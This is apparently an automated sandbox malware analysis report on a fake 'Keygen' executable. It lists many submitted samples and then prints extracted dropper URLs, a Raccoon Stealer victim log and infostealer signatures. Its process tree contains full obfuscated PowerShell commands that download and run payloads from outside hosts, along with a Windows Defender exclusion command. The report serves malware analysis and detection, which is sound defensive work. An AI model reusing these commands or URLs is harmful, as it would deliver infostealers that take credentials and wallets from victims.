Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    152s
  • max time network
    159s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (2).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:49:53 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (491 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия — копия (2).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия — копия (2).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\3949.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? — ????? (2).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Users\Admin\AppData\Local\Temp\3949.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1856
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1536
          • C:\Users\Public\wod.exe
            "C:\Users\Public\wod.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2656
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2836
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3056
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3056 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\034437024942410\\* & exit
                  8⤵
                    PID:2876
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3056
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2932
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2892
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1236
              • C:\Users\Public\wod.exe
                "C:\Users\Public\wod.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2952
                • C:\Users\Admin\AppData\Local\Temp\z4itidaAyK.exe
                  "C:\Users\Admin\AppData\Local\Temp\z4itidaAyK.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1532
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\z4itidaAyK.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2724
                • C:\Users\Admin\AppData\Local\Temp\yC0y1LzTdd.exe
                  "C:\Users\Admin\AppData\Local\Temp\yC0y1LzTdd.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2124
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2948
                  • C:\Users\Admin\AppData\Local\Temp\ZVJJp5mdOO.exe
                    "C:\Users\Admin\AppData\Local\Temp\ZVJJp5mdOO.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:2024
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\lhorgh3k.inf
                      8⤵
                        PID:2180
                    • C:\Users\Admin\AppData\Local\Temp\lj3renaTmX.exe
                      "C:\Users\Admin\AppData\Local\Temp\lj3renaTmX.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1884
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2944
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\wod.exe"
                      7⤵
                        PID:2596
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:2764
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\m1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1340
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1952
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:1840
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3949.tmp\b.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1404
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
